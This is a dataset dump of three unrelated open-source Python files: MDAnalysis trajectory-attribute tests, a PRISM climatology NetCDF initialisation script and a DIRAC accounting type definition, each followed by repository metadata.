assert_array_almost_equal(u.trajectory.ts.positions[[101, 107, 109]], new, decimal=5)
@staticmethod
def _check_atomgroup_velocities_setting(u, vel):
ag = u.atoms[[101, 107, 109]]
new = np.array([[72.4, 64.5, 74.7],
[124.6, 15.6, -1.11],
[25.2, -66.6, 0]]) + 0.1
if vel:
ag.velocities = new
assert_array_almost_equal(ag.velocities, new, decimal=5)
assert_array_almost_equal(u.trajectory.ts.velocities[[101, 107, 109]], new, decimal=5)
else:
assert_raises(NoDataError, setattr, ag, 'velocities', new)
assert_correct_errormessage((setattr, ag, 'velocities', new), 'velocities')
@staticmethod
def _check_atomgroup_forces_setting(u, force):
ag = u.atoms[[101, 107, 109]]
new = np.array([[72.4, 64.5, 74.7],
[124.6, 15.6, -1.11],
[25.2, -66.6, 0]]) + 0.2
if force:
ag.forces = new
assert_array_almost_equal(ag.forces, new, decimal=5)
assert_array_almost_equal(u.trajectory.ts.forces[[101, 107, 109]], new, decimal=5)
else:
assert_raises(NoDataError, setattr, ag, 'forces', new)
assert_correct_errormessage((setattr, ag, 'forces', new), 'forces')
@staticmethod
def _check_atom_position_setting(u, pos):
at = u.atoms[94]
new = np.array([58.3, -10.1, 0.001])
at.position = new
assert_array_almost_equal(at.position, new, decimal=5)
assert_array_almost_equal(u.trajectory.ts.positions[94], new, decimal=5)
@staticmethod
def _check_atom_velocity_setting(u, vel):
at = u.atoms[94]
new = np.array([58.3, -10.1, 0.001]) + 0.1
if vel:
at.velocity = new
assert_array_almost_equal(at.velocity, new, decimal=5)
assert_array_almost_equal(u.trajectory.ts.velocities[94], new, decimal=5)
else:
assert_raises(NoDataError, setattr, at, 'velocity', new)
assert_correct_errormessage((setattr, at, 'velocity', new), 'velocities')
@staticmethod
def _check_atom_force_setting(u, force):
at = u.atoms[94]
new = np.array([58.3, -10.1, 0.001]) + 0.2
if force:
at.force = new
assert_array_almost_equal(at.force, new, decimal=5)
assert_array_almost_equal(u.trajectory.ts.forces[94], new, decimal=5)
else:
assert_raises(NoDataError, setattr, at, 'force', new)
assert_correct_errormessage((setattr, at, 'force', new), 'forces')
def test_all(self):
# all combinations of which trajectory attributes we have
# positions is always present
for pos, vel, force in (
(True, False, False),
(True, True, False),
(True, False, True),
(True, True, True),
):
u = make_Universe(trajectory=pos, velocities=vel, forces=force)
# AtomGroup access
yield self._check_atomgroup_positions_access, u, pos
yield self._check_atomgroup_velocities_access, u, vel
yield self._check_atomgroup_forces_access, u, force
# Atom access
yield self._check_atom_position_access, u, pos
yield self._check_atom_velocity_access, u, vel
yield self._check_atom_force_access, u, force
# AtomGroup setting
yield self._check_atomgroup_positions_setting, u, pos
yield self._check_atomgroup_velocities_setting, u, vel
yield self._check_atomgroup_forces_setting, u, force
# Atom setting
yield self._check_atom_position_setting, u, pos
yield self._check_atom_velocity_setting, u, vel
yield self._check_atom_force_setting, u, force
class TestAtom_ForceVelocity(object):
def setUp(self):
self.u = MDAnalysis.Universe(PDB_xvf, TRR_xvf)
self.a = self.u.atoms[0]
def tearDown(self):
del self.u
del self.a
def test_atom_force_get(self):
assert_equal(self.a.force, self.u.atoms.forces[0])
def test_atom_velocity_get(self):
assert_equal(self.a.velocity, self.u.atoms.velocities[0])
def test_atom_force_set(self):
ref = np.arange(3)
self.a.force = ref
assert_equal(self.a.force, ref)
assert_equal(self.u.atoms.forces[0], ref)
def test_atom_velocity_set(self):
ref = np.arange(3)
self.a.velocity = ref
assert_equal(self.a.velocity, ref)
assert_equal(self.u.atoms.velocities[0], ref)
def test_pos_iteration(self):
ag = self.u.atoms[[0]]
val = np.array([self.a.position for ts in self.u.trajectory])
ref = np.array([ag.positions[0] for ts in self.u.trajectory])
assert_array_equal(val, ref)
def test_vel_iteration(self):
ag = self.u.atoms[[0]]
val = np.array([self.a.velocity for ts in self.u.trajectory])
ref = np.array([ag.velocities[0] for ts in self.u.trajectory])
assert_array_equal(val, ref)
def test_for_iteration(self):
ag = self.u.atoms[[0]]
val = np.array([self.a.force for ts in self.u.trajectory])
ref = np.array([ag.forces[0] for ts in self.u.trajectory])
assert_array_equal(val, ref)
class TestGROVelocities(object):
def setUp(self):
#reference velocities for the full 6-atom test case:
self.reference_velocities = np.array(
[[-101.227, -0.57999998, 0.43400002],
[8.08500004, 3.19099998, -7.79099989],
[-9.04500008, -26.46899986, 13.17999935],
[2.51899981, 3.1400001, -1.73399997],
[-10.64100075, -11.34899998, 0.257],
[19.42700005, -8.21600056, -0.24399999]], dtype=np.float32)
self.prec = 3
def testParse_velocities(self):
#read the velocities from the GRO_velocity file and compare the AtomGroup and individual Atom velocities
# parsed with the reference values:
u = MDAnalysis.Universe(GRO_velocity)
all_atoms = u.select_atoms('all')
#check for read-in and unit conversion for .gro file velocities for the entire AtomGroup:
assert_almost_equal(all_atoms.velocities, self.reference_velocities, self.prec,
err_msg="problem reading .gro file velocities")
#likewise for each individual atom (to be robust--in case someone alters the individual atom property code):
assert_almost_equal(all_atoms[0].velocity, self.reference_velocities[0], self.prec,
err_msg="problem reading .gro file velocities")
assert_almost_equal(all_atoms[1].velocity, self.reference_velocities[1], self.prec,
err_msg="problem reading .gro file velocities")
assert_almost_equal(all_atoms[2].velocity, self.reference_velocities[2], self.prec,
err_msg="problem reading .gro file velocities")
assert_almost_equal(all_atoms[3].velocity, self.reference_velocities[3], self.prec,
err_msg="problem reading .gro file velocities")
assert_almost_equal(all_atoms[4].velocity, self.reference_velocities[4], self.prec,
err_msg="problem reading .gro file velocities")
assert_almost_equal(all_atoms[5].velocity, self.reference_velocities[5], self.prec,
err_msg="problem reading .gro file velocities")
class TestTRRForces(object):
def setUp(self):
self.universe = MDAnalysis.Universe(PDB_xvf, TRR_xvf)
# extracted protein forces with g_traj into cobrotoxin_protein_forces.xvg.bz2
# and manually averaged over 918 atoms and 3 time steps
# native units: kJ/(mol*nm)
self.reference_mean_protein_force_native = np.array(
[3.4609879271822823, -0.63302345167392804, -1.0587882545813336], dtype=np.float32)
# MDAnalysis units of kJ/(mol*A)
self.reference_mean_protein_force = self.reference_mean_protein_force_native / 10
self.prec = 6
def tearDown(self):
del self.universe
@attr('slow')
def testForces(self):
protein = self.universe.select_atoms("protein")
assert_equal(len(protein), 918)
mean_F = np.mean([protein.forces.mean(axis=0) for ts in self.universe.trajectory], axis=0)
assert_almost_equal(mean_F, self.reference_mean_protein_force, self.prec,
err_msg="mean force on protein over whole trajectory does not match")
class TestTRRForcesNativeUnits(TestTRRForces):
def setUp(self):
super(TestTRRForcesNativeUnits, self).setUp()
# get universe without conversion
self.universe = MDAnalysis.Universe(PDB_xvf, TRR_xvf, convert_units=False)
# native Gromacs TRR units kJ/(mol*nm)
self.reference_mean_protein_force = self.reference_mean_protein_force_native
class TestAtomGroupVelocities(object):
"""Tests of velocity-related functions in AtomGroup"""
def setUp(self):
self.universe = MDAnalysis.Universe(GRO, TRR)
self.ag = self.universe.select_atoms("bynum 12:42")
def tearDown(self):
del self.ag
del self.universe
@attr('slow')
def test_get_velocities(self):
v = self.ag.velocities
assert_(np.any(np.abs(v) > 1e-6), "velocities should be non-zero")
@attr('slow')
def test_velocities(self):
ag = self.universe.atoms[42:45]
ref_v = np.array([
[-3.61757946, -4.9867239, 2.46281552],
[2.57792854, 3.25411797, -0.75065529],
[13.91627216, 30.17778587, -12.16669178]])
v = ag.velocities
assert_almost_equal(v, ref_v, err_msg="velocities were not read correctly")
@attr('slow')
def test_set_velocities(self):
ag = self.ag
v = ag.velocities - 2.7271
ag.velocities = v
assert_almost_equal(ag.velocities, v,
err_msg="messages were not set to new value")
class TestAtomGroupForces(object):
"""Tests of velocity-related functions in AtomGroup"""
def setUp(self):
self.universe = MDAnalysis.Universe(COORDINATES_XYZ, COORDINATES_TRR)
self.ag = self.universe.atoms[1:4]
def tearDown(self):
del self.universe
@attr('slow')
def test_get_forces(self):
v = self.ag.forces
assert_(np.any(np.abs(v) > 1e-6), "forces should be non-zero")
@attr('slow')
def test_forces(self):
ag = self.universe.atoms[1:4]
ref_v = np.arange(9).reshape(3, 3) * .01 + .03
v = ag.forces
assert_almost_equal(v, ref_v, err_msg="forces were not read correctly")
@attr('slow')
def test_set_forces(self):
ag = self.ag
v = ag.forces - 2.7271
ag.forces = v
assert_almost_equal(ag.forces, v,
err_msg="messages were not set to new value")
|
kain88-de/mdanalysis
|
testsuite/MDAnalysisTests/core/test_group_traj_access.py
|
Python
|
gpl-2.0
| 16,540
|
[
"Gromacs",
"MDAnalysis"
] |
566ee88ddcda62447d290c32a8a5a708a9f40cb954d945765c7d5b84391176ba
|
"""Grid out dailyc for a daily climatology on PRISM grid.
Note: PRISM's climatology is monthly/annual, so no daily :/
"""
import datetime
import os
import numpy as np
from pyiem import prism
from pyiem.util import ncopen, logger
LOG = logger()
BASEDIR = "/mesonet/data/prism"
def init_year(ts):
"""
Create a new NetCDF file for a year of our specification!
"""
fn = f"{BASEDIR}/prism_dailyc.nc"
if os.path.exists(fn):
LOG.info("%s exists, skipping", fn)
return
nc = ncopen(fn, "w")
nc.title = f"PRISM Climatology {ts.year}"
nc.platform = "Grided Climatology"
nc.description = "PRISM"
nc.institution = "Iowa State University, Ames, IA, USA"
nc.source = "Iowa Environmental Mesonet"
nc.project_id = "IEM"
nc.realization = 1
nc.Conventions = "CF-1.0" # *cough*
nc.contact = "Daryl Herzmann, akrherz@iastate.edu, 515-294-5978"
nc.history = f"{datetime.datetime.now():%d %B %Y} Generated"
nc.comment = "No Comment at this time"
# Setup Dimensions
nc.createDimension("lat", prism.NY)
nc.createDimension("lon", prism.NX)
ts2 = datetime.datetime(ts.year + 1, 1, 1)
days = (ts2 - ts).days
nc.createDimension("time", int(days))
nc.createDimension("nv", 2)
# Setup Coordinate Variables
lat = nc.createVariable("lat", float, ("lat",))
lat.units = "degrees_north"
lat.long_name = "Latitude"
lat.standard_name = "latitude"
lat.bounds = "lat_bnds"
lat.axis = "Y"
# Grid centers
lat[:] = prism.YAXIS
lat_bnds = nc.createVariable("lat_bnds", float, ("lat", "nv"))
lat_bnds[:, 0] = prism.YAXIS
lat_bnds[:, 1] = prism.YAXIS + 0.04
lon = nc.createVariable("lon", float, ("lon",))
lon.units = "degrees_east"
lon.long_name = "Longitude"
lon.standard_name = "longitude"
lon.bounds = "lon_bnds"
lon.axis = "X"
lon[:] = prism.XAXIS
lon_bnds = nc.createVariable("lon_bnds", float, ("lon", "nv"))
lon_bnds[:, 0] = prism.XAXIS
lon_bnds[:, 1] = prism.XAXIS + 0.04
tm = nc.createVariable("time", float, ("time",))
tm.units = f"Days since {ts.year}-01-01 00:00:0.0"
tm.long_name = "Time"
tm.standard_name = "time"
tm.axis = "T"
tm.calendar = "gregorian"
tm[:] = np.arange(0, int(days))
p01d = nc.createVariable(
"ppt", float, ("time", "lat", "lon"), fill_value=1.0e20
)
p01d.units = "mm"
p01d.long_name = "Precipitation"
p01d.standard_name = "Precipitation"
p01d.coordinates = "lon lat"
p01d.description = "Precipitation accumulation for the day"
high = nc.createVariable(
"tmax", float, ("time", "lat", "lon"), fill_value=-9999.0
)
high.units = "C"
high.long_name = "2m Air Temperature Daily High"
high.standard_name = "2m Air Temperature"
high.coordinates = "lon lat"
low = nc.createVariable(
"tmin", float, ("time", "lat", "lon"), fill_value=-9999.0
)
low.units = "C"
low.long_name = "2m Air Temperature Daily High"
low.standard_name = "2m Air Temperature"
low.coordinates = "lon lat"
nc.close()
def main():
"""Go Main"""
init_year(datetime.datetime(2000, 1, 1))
if __name__ == "__main__":
main()
|
akrherz/iem
|
scripts/prism/init_prism_dailyc.py
|
Python
|
mit
| 3,234
|
[
"NetCDF"
] |
80a738e6a21665759bbfa6994da6002e8caeeed1da3dc23cb3bb993c5c3e795e
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
from DIRAC.AccountingSystem.Client.Types.BaseAccountingType import BaseAccountingType
class Pilot(BaseAccountingType):
def __init__(self):
super(Pilot, self).__init__()
self.definitionKeyFields = [
("User", "VARCHAR(64)"),
("UserGroup", "VARCHAR(32)"),
("Site", "VARCHAR(64)"),
("GridCE", "VARCHAR(128)"),
("GridMiddleware", "VARCHAR(32)"),
("GridResourceBroker", "VARCHAR(128)"),
("GridStatus", "VARCHAR(32)"),
]
self.definitionAccountingFields = [
("Jobs", "INT UNSIGNED"),
]
self.checkType()
|
ic-hep/DIRAC
|
src/DIRAC/AccountingSystem/Client/Types/Pilot.py
|
Python
|
gpl-3.0
| 775
|
[
"DIRAC"
] |
1d32f4152552d3d7ca68fe6e7b90fca09f9125614a8f4b74c22c445fda9dd42f
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.